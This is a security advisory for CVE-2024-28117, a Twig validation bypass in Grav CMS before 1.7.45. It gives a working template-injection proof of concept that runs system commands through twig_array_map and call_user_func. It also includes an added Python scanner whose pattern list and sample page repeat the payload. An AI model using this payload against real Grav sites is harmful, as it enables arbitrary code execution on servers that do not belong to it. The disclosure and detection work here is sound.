First published: Thu Mar 21 2024
### Summary

Grav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on Twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands.

### Details

```
{{ grav.twig.twig.getFunction('twig_array_map')|var_dump }}
```

When we accessed twig_array_map like this, we confirmed that the TwigFunction object is properly returned. Since the callable property is correctly included, we can access twig_array_map without any restrictions.

```
{% set cmd = {'id':'system'} %}
{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}
```

Since there is no validation on twig_array_map itself, it is possible to call arbitrary functions using call_user_func.

### PoC

```
{% set cmd = {'id':'system'} %}
{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}
```

### Impact

Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.
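As an added example (not part of the advisory or of Grav's own code), the following script gives an administrator a way to audit existing page sources for the combination the Impact section describes: Twig processing enabled in the front matter together with the constructs used in the Details section. The page contents, paths and the SUSPICIOUS pattern list are constructed for this illustration.

```python
import re
from typing import Dict, List

# Constructed sample Grav page sources (not taken from any real site).
SAMPLE_PAGES: Dict[str, str] = {
    "user/pages/01-home/default.md": (
        "---\ntitle: Home\nprocess:\n    twig: true\n---\n"
        "{% set cmd = {'id':'system'} %}\n"
        "{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}\n"
    ),
    "user/pages/02-about/default.md": (
        "---\ntitle: About\n---\n"
        "Plain markdown, no Twig processing.\n"
    ),
    "user/pages/03-blog/default.md": (
        "---\ntitle: Blog\nprocess:\n    twig: true\n---\n"
        "{{ page.title }} rendered with harmless Twig.\n"
    ),
}

# Twig constructs from the advisory that ordinary page content never needs.
SUSPICIOUS: List[str] = [
    r"twig_array_map\s*\(",
    r"grav\.twig\.twig",
    r"call_user_func",
    r"getFunction\s*\(",
]


def twig_enabled(source: str) -> bool:
    """True when the YAML front matter of a page turns on Twig processing."""
    m = re.match(r"---\n(.*?)\n---\n", source, re.S)
    if not m:
        return False
    return re.search(r"^\s*twig:\s*true\b", m.group(1), re.M) is not None


def scan_page(source: str) -> List[str]:
    """Return the suspicious patterns present in a Twig-enabled page body."""
    if not twig_enabled(source):
        return []
    body = source.split("---\n", 2)[2]  # text after the front matter
    return [p for p in SUSPICIOUS if re.search(p, body)]


def scan_all(pages: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each page path to its findings, omitting clean pages."""
    findings = {}
    for path, source in pages.items():
        hits = scan_page(source)
        if hits:
            findings[path] = hits
    return findings
```

Pages that appear in the result should be reviewed, and the instance upgraded to 1.7.45 or later regardless of the scan outcome.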
Credit: security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| composer/getgrav/grav | <1.7.45 | 1.7.45 |
| Getgrav | <1.7.45 | |
The severity of CVE-2024-28117 is currently rated as critical due to the potential for arbitrary command execution.
To fix CVE-2024-28117, upgrade to the patched version 1.7.45 or later of the Grav software.
CVE-2024-28117 can allow attackers to execute arbitrary commands on the server, compromising the entire application.
CVE-2024-28117 affects all versions of Grav prior to 1.7.45.
Exploitation of CVE-2024-28117 relies on the lack of restrictions on the twig_array_map function, which allows the Utils::isDangerousFunction validation to be bypassed.